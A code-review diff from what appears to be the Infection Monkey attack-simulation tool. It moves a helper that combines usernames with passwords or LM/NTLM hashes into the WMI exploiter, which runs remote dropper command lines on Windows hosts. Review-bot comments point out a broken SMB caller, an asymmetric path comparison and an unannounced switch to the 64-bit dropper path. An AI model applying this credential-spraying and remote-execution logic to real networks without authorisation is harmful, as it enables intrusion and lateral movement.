Agent: decouple wmiexec.py from WormConfig object
parent
d7e222c8a8
commit
c932a19b47
|
@ -151,20 +151,6 @@ class Configuration(object):
|
||||||
"""
|
"""
|
||||||
return product(self.exploit_user_list, self.exploit_ssh_keys)
|
return product(self.exploit_user_list, self.exploit_ssh_keys)
|
||||||
|
|
||||||
def get_exploit_user_password_or_hash_product(self):
|
|
||||||
"""
|
|
||||||
Returns all combinations of the configurations users and passwords or lm/ntlm hashes
|
|
||||||
:return:
|
|
||||||
"""
|
|
||||||
cred_list = []
|
|
||||||
for cred in product(self.exploit_user_list, self.exploit_password_list, [""], [""]):
|
|
||||||
cred_list.append(cred)
|
|
||||||
for cred in product(self.exploit_user_list, [""], [""], self.exploit_ntlm_hash_list):
|
|
||||||
cred_list.append(cred)
|
|
||||||
for cred in product(self.exploit_user_list, [""], self.exploit_lm_hash_list, [""]):
|
|
||||||
cred_list.append(cred)
|
|
||||||
return cred_list
|
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def hash_sensitive_data(sensitive_data):
|
def hash_sensitive_data(sensitive_data):
|
||||||
"""
|
"""
|
||||||
|
|
|
@ -52,6 +52,7 @@ class SmbExploiter(HostExploiter):
|
||||||
logger.info("Can't find suitable monkey executable for host %r", self.host)
|
logger.info("Can't find suitable monkey executable for host %r", self.host)
|
||||||
return False
|
return False
|
||||||
|
|
||||||
|
# TODO extract the method in wmiexec.py
|
||||||
creds = self._config.get_exploit_user_password_or_hash_product()
|
creds = self._config.get_exploit_user_password_or_hash_product()
|
||||||
|
|
||||||
exploited = False
|
exploited = False
|
||||||
|
|
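Review bot: The unchanged line `creds = self._config.get_exploit_user_password_or_hash_product()` still calls the method that this commit deletes from `Configuration` in the `@ -151,20 +151,6` hunk. If `self._config` is an instance of that class, the SMB exploiter will raise `AttributeError` as soon as it reaches this line. The added `# TODO extract the method in wmiexec.py` reads as optional clean-up and does not warn about that. Either keep the `Configuration` method until this caller is migrated, or move the new helper into a shared module and call it here in the same commit. The enclosing method starts and ends outside the hunk.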
|
@ -2,13 +2,14 @@ import logging
|
||||||
import ntpath
|
import ntpath
|
||||||
import socket
|
import socket
|
||||||
import traceback
|
import traceback
|
||||||
from typing import List
|
from itertools import product
|
||||||
|
from typing import List, Mapping
|
||||||
|
|
||||||
from impacket.dcerpc.v5.rpcrt import DCERPCException
|
from impacket.dcerpc.v5.rpcrt import DCERPCException
|
||||||
|
|
||||||
from common.utils.exploit_enum import ExploitType
|
from common.utils.exploit_enum import ExploitType
|
||||||
from infection_monkey.exploit.HostExploiter import HostExploiter
|
from infection_monkey.exploit.HostExploiter import HostExploiter
|
||||||
from infection_monkey.exploit.tools.helpers import get_monkey_depth, get_target_monkey
|
from infection_monkey.exploit.tools.helpers import get_monkey_depth
|
||||||
from infection_monkey.exploit.tools.smb_tools import SmbTools
|
from infection_monkey.exploit.tools.smb_tools import SmbTools
|
||||||
from infection_monkey.exploit.tools.wmi_tools import AccessDeniedException, WmiTools
|
from infection_monkey.exploit.tools.wmi_tools import AccessDeniedException, WmiTools
|
||||||
from infection_monkey.model import DROPPER_CMDLINE_WINDOWS, MONKEY_CMDLINE_WINDOWS
|
from infection_monkey.model import DROPPER_CMDLINE_WINDOWS, MONKEY_CMDLINE_WINDOWS
|
||||||
|
@ -28,7 +29,7 @@ class WmiExploiter(HostExploiter):
|
||||||
@WmiTools.dcom_wrap
|
@WmiTools.dcom_wrap
|
||||||
def _exploit_host(self):
|
def _exploit_host(self):
|
||||||
|
|
||||||
creds = self._config.get_exploit_user_password_or_hash_product()
|
creds = _get_exploit_user_password_or_hash_product(self.options["credentials"])
|
||||||
|
|
||||||
for user, password, lm_hash, ntlm_hash in creds:
|
for user, password, lm_hash, ntlm_hash in creds:
|
||||||
creds_for_log = _get_credential_string([user, password, lm_hash, ntlm_hash])
|
creds_for_log = _get_credential_string([user, password, lm_hash, ntlm_hash])
|
||||||
|
@ -83,20 +84,20 @@ class WmiExploiter(HostExploiter):
|
||||||
password,
|
password,
|
||||||
lm_hash,
|
lm_hash,
|
||||||
ntlm_hash,
|
ntlm_hash,
|
||||||
self._config.smb_download_timeout,
|
self.options["smb_download_timeout"],
|
||||||
)
|
)
|
||||||
|
|
||||||
if not remote_full_path:
|
if not remote_full_path:
|
||||||
wmi_connection.close()
|
wmi_connection.close()
|
||||||
return False
|
return False
|
||||||
# execute the remote dropper in case the path isn't final
|
# execute the remote dropper in case the path isn't final
|
||||||
elif remote_full_path.lower() != self._config.dropper_target_path_win_32.lower():
|
elif remote_full_path.lower() != self.options["dropper_target_path_win_64"]:
|
||||||
cmdline = DROPPER_CMDLINE_WINDOWS % {
|
cmdline = DROPPER_CMDLINE_WINDOWS % {
|
||||||
"dropper_path": remote_full_path
|
"dropper_path": remote_full_path
|
||||||
} + build_monkey_commandline(
|
} + build_monkey_commandline(
|
||||||
self.host,
|
self.host,
|
||||||
get_monkey_depth() - 1,
|
get_monkey_depth() - 1,
|
||||||
self._config.dropper_target_path_win_32,
|
self.options["dropper_target_path_win_64"],
|
||||||
)
|
)
|
||||||
else:
|
else:
|
||||||
cmdline = MONKEY_CMDLINE_WINDOWS % {
|
cmdline = MONKEY_CMDLINE_WINDOWS % {
|
||||||
|
@ -139,6 +140,27 @@ class WmiExploiter(HostExploiter):
|
||||||
return False
|
return False
|
||||||
|
|
||||||
|
|
||||||
|
def _get_exploit_user_password_or_hash_product(credentials: Mapping) -> List:
|
||||||
|
"""
|
||||||
|
Returns all combinations of the configurations users and passwords or lm/ntlm hashes
|
||||||
|
:return:
|
||||||
|
"""
|
||||||
|
cred_list = []
|
||||||
|
for cred in product(
|
||||||
|
credentials["exploit_user_list"], credentials["exploit_password_list"], [""], [""]
|
||||||
|
):
|
||||||
|
cred_list.append(cred)
|
||||||
|
for cred in product(
|
||||||
|
credentials["exploit_user_list"], [""], [""], credentials["exploit_ntlm_hash_list"]
|
||||||
|
):
|
||||||
|
cred_list.append(cred)
|
||||||
|
for cred in product(
|
||||||
|
credentials["exploit_user_list"], [""], credentials["exploit_lm_hash_list"], [""]
|
||||||
|
):
|
||||||
|
cred_list.append(cred)
|
||||||
|
return cred_list
|
||||||
|
|
||||||
|
|
||||||
def _get_credential_string(creds: List) -> str:
|
def _get_credential_string(creds: List) -> str:
|
||||||
cred_strs = [
|
cred_strs = [
|
||||||
(creds[0], "username"),
|
(creds[0], "username"),
|
||||||
|
|
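Review bot: In the `@ -83,20 +84,20` hunk the new `elif remote_full_path.lower() != self.options["dropper_target_path_win_64"]:` lowercases only the left operand, while the old line also called `.lower()` on the configured path. A configured path containing any uppercase character can then never compare equal, so the dropper command line is always chosen; restore the symmetric form, `elif remote_full_path.lower() != self.options["dropper_target_path_win_64"].lower():`. The same lines also switch from `dropper_target_path_win_32` to `dropper_target_path_win_64`, which the commit title does not mention and is worth confirming as intended. In the last hunk, the docstring of `_get_exploit_user_password_or_hash_product` keeps an empty `:return:`; something like `:return: list of (user, password, lm_hash, ntlm_hash) tuples, unused fields set to ""` would document the shape the loop in `_exploit_host` unpacks. The body of `_exploit_host` continues outside the visible hunks.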